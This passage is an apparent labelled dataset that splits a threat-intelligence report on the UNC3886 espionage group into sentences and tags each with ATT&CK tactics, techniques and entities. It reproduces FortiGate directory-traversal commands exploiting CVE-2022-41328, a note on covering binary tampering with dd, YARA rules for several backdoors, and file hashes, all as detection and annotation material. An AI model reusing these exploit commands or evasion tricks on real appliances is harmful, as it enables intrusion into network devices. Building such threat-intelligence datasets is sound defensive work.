always skipped digital signature verification checks normally made on the system files.\n/data/extlinux.sys\n/data/extlinux.conf\n/data/boot.msg\n/data/vmlinuz\n/data/rootfse-fe\nSince the\nmount\ncommand executes prior to /etc/init.d/localnet on system startup, the dd command will overwrite the 22,866 th byte of /bin/smit with the character “ ”, reverting the binary to a state that appears as if it was never tampered with, even if the file was hashed.", "sentence_text": "Attribution\nUNC3886 is an advanced cyber espionage group with unique capabilities in how they operate on-network as well as the tools they utilize in their campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s119-bcb0f5", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 119, "context_before": "Attribution\nUNC3886 is an advanced cyber espionage group with unique capabilities in how they operate on-network as well as the tools they utilize in their campaigns.", "sentence_text": "UNC3886 has been observed targeting firewall and virtualization technologies which lack EDR support.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Targets firewall and virtualization technologies lacking EDR support", "entities": [ { "text": "UNC3886 ", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "firewall and virtualization technologies which lack EDR support", "start": 36, "end": 99, "label": "Infrastructure_Indicator" }, { "text": "targeting ", "start": 26, "end": 36, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s120-9a69f0", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 120, "context_before": "UNC3886 has been observed targeting firewall and virtualization technologies which lack EDR support.", "sentence_text": "Their ability to manipulate firewall firmware and exploit a zero-day indicates they have curated a deeper-level of understanding of such technologies.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1553", "name": "Subvert Trust Controls" } ], "procedure": "Manipulates firewall firmware and exploits zero-day vulnerabilities", "entities": [ { "text": " firewall firmware", "start": 27, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "exploit ", "start": 50, "end": 58, "label": "Action" }, { "text": "manipulate ", "start": 17, "end": 28, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s121-5395b7", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 121, "context_before": "Their ability to manipulate firewall firmware and exploit a zero-day indicates they have curated a deeper-level of understanding of such technologies.", "sentence_text": "UNC3886 has modified publicly available malware, specifically targeting *nix operating systems.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Modified publicly available malware to target *nix operating systems", "entities": [ { "text": "UNC3886 ", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": " publicly available malware", "start": 20, "end": 47, "label": "MalwareTool" }, { "text": "*nix operating systems", "start": 72, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "modified ", "start": 12, "end": 21, "label": "Action" }, { "text": "targeting ", "start": 62, "end": 72, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s122-896357", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 122, "context_before": "UNC3886 has modified publicly available malware, specifically targeting *nix operating systems.", "sentence_text": "Another threat cluster unrelated to UNC3886, suspected to be from China has recently been observed targeting zero-day vulnerabilities in Fortinet as reported by Mandiant in mid-January of 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s123-72ff99", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 123, "context_before": "Another threat cluster unrelated to UNC3886, suspected to be from China has recently been observed targeting zero-day vulnerabilities in Fortinet as reported by Mandiant in mid-January of 2023.", "sentence_text": "Conclusion\nThe activity discussed in this blog post is further evidence that advanced cyber espionage threat actors are taking advantage of any technology available to persist and traverse a target environment, especially those technologies that do not support EDR solutions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s124-7d001c", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 124, "context_before": "Conclusion\nThe activity discussed in this blog post is further evidence that advanced cyber espionage threat actors are taking advantage of any technology available to persist and traverse a target environment, especially those technologies that do not support EDR solutions.", "sentence_text": "This presents a unique challenge for investigators as many network appliances lack solutions to detect runtime modifications made to the underlying operating system and require direct involvement of the manufacturer to collect forensic images.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s125-b6f530", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 125, "context_before": "This presents a unique challenge for investigators as many network appliances lack solutions to detect runtime modifications made to the underlying operating system and require direct involvement of the manufacturer to collect forensic images.", "sentence_text": "Cross organizational communication and collaboration is key to providing both manufacturers with early notice of new attack methods in the wild before they are made public and investigators with expertise to better shed light on these new attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s126-68c2aa", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 126, "context_before": "Cross organizational communication and collaboration is key to providing both manufacturers with early notice of new attack methods in the wild before they are made public and investigators with expertise to better shed light on these new attacks.", "sentence_text": "In addition, we would also like to thank Fortinet and VMware for their collaboration on this research.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s127-6e9e5e", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 127, "context_before": "In addition, we would also like to thank Fortinet and VMware for their collaboration on this research.", "sentence_text": "Fortinet released two additional resources covering CVE-2022-41328 and an analysis of identified attacker activity MITRE ATT&CK Techniques Impact T1565.001: Stored Data Manipulation Defense Evasion T1027:        Obfuscated Files or Information T1070:        Indicator Removal T1070.003:    Clear Command History T1070.004:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s128-4fe932", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 128, "context_before": "Fortinet released two additional resources covering CVE-2022-41328 and an analysis of identified attacker activity MITRE ATT&CK Techniques Impact T1565.001: Stored Data Manipulation Defense Evasion T1027:        Obfuscated Files or Information T1070:        Indicator Removal T1070.003:    Clear Command History T1070.004:", "sentence_text": "File Deletion T1078:        Valid Accounts T1140:        Deobfuscate/Decode Files or Information T1202:        Indirect Command Execution T1218.011:    Rundll32 T1222:        File and Directory Permissions Modification T1497:        Virtualization/Sandbox Evasion T1497.001:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s129-1ce6ce", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 129, "context_before": "File Deletion T1078:        Valid Accounts T1140:        Deobfuscate/Decode Files or Information T1202:        Indirect Command Execution T1218.011:    Rundll32 T1222:        File and Directory Permissions Modification T1497:        Virtualization/Sandbox Evasion T1497.001:", "sentence_text": "System Checks T1620:        Reflective Code Loading Credential Access T1552:        Unsecured Credentials T1555.005:    Password Managers Discovery T1016:        System Network Configuration Discovery T1033:        System Owner/User Discovery T1057:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s130-16f136", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 130, "context_before": "System Checks T1620:        Reflective Code Loading Credential Access T1552:        Unsecured Credentials T1555.005:    Password Managers Discovery T1016:        System Network Configuration Discovery T1033:        System Owner/User Discovery T1057:", "sentence_text": "Process Discovery T1082:        System Information Discovery T1083:        File and Directory Discovery T1087:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s131-85c3ec", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 131, "context_before": "Process Discovery T1082:        System Information Discovery T1083:        File and Directory Discovery T1087:", "sentence_text": "Account Discovery T1518:        Software Discovery Collection T1074.001:    Local Data Staging T1560:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s132-31abda", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 132, "context_before": "Account Discovery T1518:        Software Discovery Collection T1074.001:    Local Data Staging T1560:", "sentence_text": "Archive Collected Data T1560.001:    Archive via Utility Execution T1059:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s133-23a4b6", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 133, "context_before": "Archive Collected Data T1560.001:    Archive via Utility Execution T1059:", "sentence_text": "Command and Scripting Interpreter T1059.001:    PowerShell T1059.003:    Windows Command Shell T1059.004:    Unix Shell T1059.006:    Python T1129:        Shared Modules Command and Control T1095:        Non-Application Layer Protocol T1102.001:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s134-276ca3", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 134, "context_before": "Command and Scripting Interpreter T1059.001:    PowerShell T1059.003:    Windows Command Shell T1059.004:    Unix Shell T1059.006:    Python T1129:        Shared Modules Command and Control T1095:        Non-Application Layer Protocol T1102.001:", "sentence_text": "Dead Drop Resolver T1105:        Ingress Tool Transfer T1571:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s135-dbb441", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 135, "context_before": "Dead Drop Resolver T1105:        Ingress Tool Transfer T1571:", "sentence_text": "Non-Standard Port T1573.001:    Symmetric Cryptography Lateral Movement T1021.004:    SSH Indicators of Compromise YARA Rules rule M_Hunting_Util_TABLEFLIP_1 { meta:\nauthor = \"Mandiant\" description = \"Looks for TABLEFLIP Binary\" md5 = \"b6e92149efaf78e9ce7552297505b9d5\" strings:\n$z1 = \"%1$s.*%2$d\" fullword $x1 = \"/proc/self/exe\" fullword $x2 = \"socket\" fullword $x3 = \"127.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s136-f15674", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 136, "context_before": "Non-Standard Port T1573.001:    Symmetric Cryptography Lateral Movement T1021.004:    SSH Indicators of Compromise YARA Rules rule M_Hunting_Util_TABLEFLIP_1 { meta:\nauthor = \"Mandiant\" description = \"Looks for TABLEFLIP Binary\" md5 = \"b6e92149efaf78e9ce7552297505b9d5\" strings:\n$z1 = \"%1$s.*%2$d\" fullword $x1 = \"/proc/self/exe\" fullword $x2 = \"socket\" fullword $x3 = \"127.\"", "sentence_text": "fullword $x4 = \"iptables -t nat\" fullword $s1 = \"iptables -t nat -S PREROUTING | grep", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s137-1fb49e", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 137, "context_before": "fullword $x4 = \"iptables -t nat\" fullword $s1 = \"iptables -t nat -S PREROUTING | grep", "sentence_text": "== 0x464c457f and filesize < 5MB and @x1 <= @x2 and @x2 <= @x3 and @x3 <= @x4 and ( $z1 or any of ($s*) )\n}\nrule M_Hunting_Backdoor_REPTILE_1\n{\nmeta:\nauthor = \"Mandiant\" description = \"Looks for ELF backdoor REPTILE variant\" md5 = \"53a69adac914808eced2bf8155a7512d\" strings:\n$x1 = \";7(Zu9YTsA7qQ#vw\" $x2 = \"mznCvqSBo\" $x3 = \"hpaVAj2FJ\" $x4 = \"%d.%d.%d.%d\" $x5 = \"HISTFILE=\" $x6 = \"TERM\" $x7 = { 58 90 AE 86 F1 B9 1C F6 29 83 95 71 1D DE 58 0D } // taken from FE_Hunting_Linux_TINYSHELL_2_FEBeta.yara condition:\nuint32(0)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s138-c55bec", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 138, "context_before": "== 0x464c457f and filesize < 5MB and @x1 <= @x2 and @x2 <= @x3 and @x3 <= @x4 and ( $z1 or any of ($s*) )\n}\nrule M_Hunting_Backdoor_REPTILE_1\n{\nmeta:\nauthor = \"Mandiant\" description = \"Looks for ELF backdoor REPTILE variant\" md5 = \"53a69adac914808eced2bf8155a7512d\" strings:\n$x1 = \";7(Zu9YTsA7qQ#vw\" $x2 = \"mznCvqSBo\" $x3 = \"hpaVAj2FJ\" $x4 = \"%d.%d.%d.%d\" $x5 = \"HISTFILE=\" $x6 = \"TERM\" $x7 = { 58 90 AE 86 F1 B9 1C F6 29 83 95 71 1D DE 58 0D } // taken from FE_Hunting_Linux_TINYSHELL_2_FEBeta.yara condition:\nuint32(0)", "sentence_text": "== 0x464c457f and all of them and #x4 >= 3 and #x6 == 1 and filesize < 15MB } rule M_Hunting_Backdoor_CASTLETAP_1 { meta:\nauthor = \"Mandiant\" description = \"Finds strings observed in CASTLETOP ELF binary\" md5 = \"e2d2884869f48f40b32fb27cc3bdefff\" strings:\n$x1 = \";7(Zu9YTsA7qQ#vw\" $x2 = \"qWWlC0v6yYh2yxu\" $x3 = \"1qaz@WSXa\" $x4 = \"hpaVAj2FJ\" $x5 = \"%d.%d.%d.%d\" $x6 = \"HISTFILE=\" $x7 = \"TERM\" $x8 = \"/tmp/busybox\" $x9 = { 58 90 AE 86 F1 B9 1C F6 29 83 95 71 1D DE 58 0D } condition:\nuint16(18)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s139-3118b7", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 139, "context_before": "== 0x464c457f and all of them and #x4 >= 3 and #x6 == 1 and filesize < 15MB } rule M_Hunting_Backdoor_CASTLETAP_1 { meta:\nauthor = \"Mandiant\" description = \"Finds strings observed in CASTLETOP ELF binary\" md5 = \"e2d2884869f48f40b32fb27cc3bdefff\" strings:\n$x1 = \";7(Zu9YTsA7qQ#vw\" $x2 = \"qWWlC0v6yYh2yxu\" $x3 = \"1qaz@WSXa\" $x4 = \"hpaVAj2FJ\" $x5 = \"%d.%d.%d.%d\" $x6 = \"HISTFILE=\" $x7 = \"TERM\" $x8 = \"/tmp/busybox\" $x9 = { 58 90 AE 86 F1 B9 1C F6 29 83 95 71 1D DE 58 0D } condition:\nuint16(18)", "sentence_text": "== 0x464c457f and 1 of ($x*) and #x5 >= 3 and #x7 == 1 and filesize < 15MB } rule M_Hunting_Backdoor_CASTLETAP_2 { meta:\nauthor = \"Mandiant\" description = \"Finds byte pattern related to XOR decode function\" md5 = \"e2d2884869f48f40b32fb27cc3bdefff\" strings:\n$x1 = { ??", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s142-03c487", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 142, "context_before": "B0 1D 11 ??", "sentence_text": "== 0x464c457f and any of them and filesize < 15MB } Posted in Threat Intelligence Security & Identity Related articles Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s143-2cebbc", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 143, "context_before": "== 0x464c457f and any of them and filesize < 15MB } Posted in Threat Intelligence Security & Identity Related articles Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read Threat Intelligence Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace By Google Threat Intelligence Group • 7-minute read Threat Intelligence To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER By Google Threat Intelligence Group • 12-minute read [FILTERED_TABLES_START]\n1qaz@WSXa | Parse C2 information from ICMP payload and connect to it over SSL.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" }, { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Parses C2 information from ICMP payload and connects over SSL", "entities": [ { "text": "ICMP payload", "start": 496, "end": 508, "label": "Infrastructure_Indicator" }, { "text": " SSL", "start": 531, "end": 535, "label": "Infrastructure_Indicator" }, { "text": "connect ", "start": 513, "end": 521, "label": "Action" }, { "text": "Parse ", "start": 470, "end": 476, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s144-dbd9e4", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 144, "context_before": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read Threat Intelligence Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace By Google Threat Intelligence Group • 7-minute read Threat Intelligence To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER By Google Threat Intelligence Group • 12-minute read [FILTERED_TABLES_START]\n1qaz@WSXa | Parse C2 information from ICMP payload and connect to it over SSL.", "sentence_text": "<0x0c-0x10> | mznCvqSBo | Parse C2 information from OSI layer 2 packet and connects to it over SSL.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" }, { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Parses C2 information from OSI layer 2 packet and connects over SSL", "entities": [ { "text": "OSI layer 2 packet", "start": 72, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "SSL", "start": 115, "end": 118, "label": "Infrastructure_Indicator" }, { "text": "Parse ", "start": 46, "end": 52, "label": "Action" }, { "text": "connects ", "start": 95, "end": 104, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s145-5496e2", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 145, "context_before": "<0x0c-0x10> | mznCvqSBo | Parse C2 information from OSI layer 2 packet and connects to it over SSL.", "sentence_text": "FortiGate Command | execute wireless-controller hs20-icon upload-icon ftp ../../../../../../bin/lspci | Attempted execution of this command or similar commands containing directory traversal are indicative of attempted exploitation of CVE-2022-41328 to upload a file to a normally restricted directory FortiGate Command | execute wireless-controller hs20-icon upload-icon tftp ../../../../../../bin/lspci | Attempted execution of this command or similar commands containing directory traversal are indicative of attempted exploitation of CVE-2022-41328 to upload a file to a normally restricted directory Python Function | get_device_info |", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Attempted directory traversal exploitation of CVE-2022-41328 to upload files to restricted directories", "entities": [ { "text": "CVE-2022-41328", "start": 571, "end": 585, "label": "Infrastructure_Indicator" }, { "text": "/bin/lspci", "start": 91, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "TA FTP Server", "start": 103, "end": 116, "label": "Infrastructure_Indicator" }, { "text": "/bin/lspci ", "start": 410, "end": 421, "label": "Infrastructure_Indicator" }, { "text": "TA TFTP Server", "start": 422, "end": 436, "label": "Infrastructure_Indicator" }, { "text": " CVE-2022-41328", "start": 250, "end": 265, "label": "Infrastructure_Indicator" }, { "text": "upload ", "start": 269, "end": 276, "label": "Action" }, { "text": "directory traversal", "start": 187, "end": 206, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s146-dd3c3d", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 146, "context_before": "FortiGate Command | execute wireless-controller hs20-icon upload-icon ftp ../../../../../../bin/lspci | Attempted execution of this command or similar commands containing directory traversal are indicative of attempted exploitation of CVE-2022-41328 to upload a file to a normally restricted directory FortiGate Command | execute wireless-controller hs20-icon upload-icon tftp ../../../../../../bin/lspci | Attempted execution of this command or similar commands containing directory traversal are indicative of attempted exploitation of CVE-2022-41328 to upload a file to a normally restricted directory Python Function | get_device_info |", "sentence_text": "A malicious python function added to /usr/local/lib/python3.8/proj/util/views.py on FortiAnalyzer and FortiManager devices which provided threat actors with a persistent backdoor MD5 | 9ce2459168cf4b5af494776a70e0feda", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Added malicious Python function to create persistent backdoor", "entities": [ { "text": "persistent backdoor", "start": 159, "end": 178, "label": "MalwareTool" }, { "text": "/usr/local/lib/python3.8/proj/util/views.py ", "start": 37, "end": 81, "label": "Infrastructure_Indicator" }, { "text": "FortiAnalyzer ", "start": 84, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "FortiManager ", "start": 102, "end": 115, "label": "Infrastructure_Indicator" }, { "text": "MD5 | 9ce2459168cf4b5af494776a70e0feda", "start": 179, "end": 217, "label": "Infrastructure_Indicator" }, { "text": "added ", "start": 28, "end": 34, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s147-56d563", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 147, "context_before": "A malicious python function added to /usr/local/lib/python3.8/proj/util/views.py on FortiAnalyzer and FortiManager devices which provided threat actors with a persistent backdoor MD5 | 9ce2459168cf4b5af494776a70e0feda", "sentence_text": "| Threat actor script which launches /bin/auth (TABLEFLIP) and /bin/klogd (REPTILE) and deletes the two files along with /bin/support from disk MD5 | b6e92149efaf78e9ce7552297505b9d5 |", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Launches TABLEFLIP and REPTILE malware and deletes files from disk", "entities": [ { "text": " MD5 | b6e92149efaf78e9ce7552297505b9d5", "start": 143, "end": 182, "label": "Infrastructure_Indicator" }, { "text": "TABLEFLIP", "start": 48, "end": 57, "label": "MalwareTool" }, { "text": "REPTILE", "start": 75, "end": 82, "label": "MalwareTool" }, { "text": "/bin/support ", "start": 121, "end": 134, "label": "Infrastructure_Indicator" }, { "text": "/bin/klogd", "start": 63, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "launches ", "start": 28, "end": 37, "label": "Action" }, { "text": "deletes ", "start": 88, "end": 96, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s148-3b50ea", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 148, "context_before": "| Threat actor script which launches /bin/auth (TABLEFLIP) and /bin/klogd (REPTILE) and deletes the two files along with /bin/support from disk MD5 | b6e92149efaf78e9ce7552297505b9d5 |", "sentence_text": "TABLEFLIP sample MD5 | 53a69adac914808eced2bf8155a7512d | REPTILE variant  sample MD5", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s149-c53a40", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 149, "context_before": "TABLEFLIP sample MD5 | 53a69adac914808eced2bf8155a7512d | REPTILE variant  sample MD5", "sentence_text": "| a388ebaef45add5da503e4bf2b9da546 | Modified /bin/smit MD5 | 88711ebc99e1390f1ce2f42a6de0654d", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s150-581451", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 150, "context_before": "| a388ebaef45add5da503e4bf2b9da546 | Modified /bin/smit MD5 | 88711ebc99e1390f1ce2f42a6de0654d", "sentence_text": "| Localnet sample MD5 | e2d2884869f48f40b32fb27cc3bdefff", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s151-7c528f", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 151, "context_before": "| Localnet sample MD5 | e2d2884869f48f40b32fb27cc3bdefff", "sentence_text": "| CASTLETAP sample MD5 | 53a69adac914808eced2bf8155a7512d | REPTILE variant sample MD5 | 64bdf7a631bc76b01b985f1d46b35ea6", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s152-b1074f", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 152, "context_before": "| CASTLETAP sample MD5 | 53a69adac914808eced2bf8155a7512d | REPTILE variant sample MD5 | 64bdf7a631bc76b01b985f1d46b35ea6", "sentence_text": "| THINCRUST sample", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s153-085b9f", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 153, "context_before": "| THINCRUST sample", "sentence_text": "MD5 | a86a8fe875a89816e5808588154a067e | THINCRUST sample", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s154-3f4e55", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 154, "context_before": "MD5 | a86a8fe875a89816e5808588154a067e | THINCRUST sample", "sentence_text": "MD5 | 3e43511c4f7f551290292394c4e21de7 | Related to THINCRUST SHA1", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s155-2bbf8c", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 155, "context_before": "MD5 | 3e43511c4f7f551290292394c4e21de7 | Related to THINCRUST SHA1", "sentence_text": "| 86f3623b3fb8d5303b6c9d8295292a5c2ceb2889 | Localnet sample SHA1 | 75c092098e3409d366a46fdde6a92ff97d29cee1 | Smit sample SHA1 | 9dca7f1af5752bb007e5cc55acd2511f03049ee5 | TABLEFLIP sample SHA1 | 8c40fc87fa3b25a559585b10a8ca11c81fb09f75 | CASTLETAP sample SHA1 | 3109b890901499f7ebb90f8870a7d1617d27e7c9", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s156-6901b9", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 156, "context_before": "| 86f3623b3fb8d5303b6c9d8295292a5c2ceb2889 | Localnet sample SHA1 | 75c092098e3409d366a46fdde6a92ff97d29cee1 | Smit sample SHA1 | 9dca7f1af5752bb007e5cc55acd2511f03049ee5 | TABLEFLIP sample SHA1 | 8c40fc87fa3b25a559585b10a8ca11c81fb09f75 | CASTLETAP sample SHA1 | 3109b890901499f7ebb90f8870a7d1617d27e7c9", "sentence_text": "| REPTILE variant sample SHA1 | b8bdaa1bd204a6c710875b0c4265655d1fd37d52 | /bin/support sample SHA1 | 1a077212735617a665a6b631e34a6aedcbc41713 | THINCRUST sample SHA1 | d5f8436e9815358e33b8243abda76c9b398943e2 | THINCRUST sample SHA1 | 8ef5159944d048fe84e51a818c9b11ebcfa98517", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s157-a5f059", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 157, "context_before": "| REPTILE variant sample SHA1 | b8bdaa1bd204a6c710875b0c4265655d1fd37d52 | /bin/support sample SHA1 | 1a077212735617a665a6b631e34a6aedcbc41713 | THINCRUST sample SHA1 | d5f8436e9815358e33b8243abda76c9b398943e2 | THINCRUST sample SHA1 | 8ef5159944d048fe84e51a818c9b11ebcfa98517", "sentence_text": "| Related to THINCRUST SHA256", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s158-7c3196", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 158, "context_before": "| Related to THINCRUST SHA256", "sentence_text": "| 245e4646e5d984c2da4cfe223bb2fae679441bcf42b254fc193ae97dc32af7ad", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s159-07db23", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 159, "context_before": "| 245e4646e5d984c2da4cfe223bb2fae679441bcf42b254fc193ae97dc32af7ad", "sentence_text": "| Localnet sample SHA256 | 9fb09fe6db61fbdd19ac9c368e2f64fb9606119649830762fa467719c480ed44", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s160-daf898", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 160, "context_before": "| Localnet sample SHA256 | 9fb09fe6db61fbdd19ac9c368e2f64fb9606119649830762fa467719c480ed44", "sentence_text": "| Smit sample SHA256 | 18afbad17dee0e4330a85b782e8e580c6125d8a7127cda69ad0e2728d505a6f5", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s161-8b4d8f", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 161, "context_before": "| Smit sample SHA256 | 18afbad17dee0e4330a85b782e8e580c6125d8a7127cda69ad0e2728d505a6f5", "sentence_text": "| TABLEFLIP sample SHA256 | 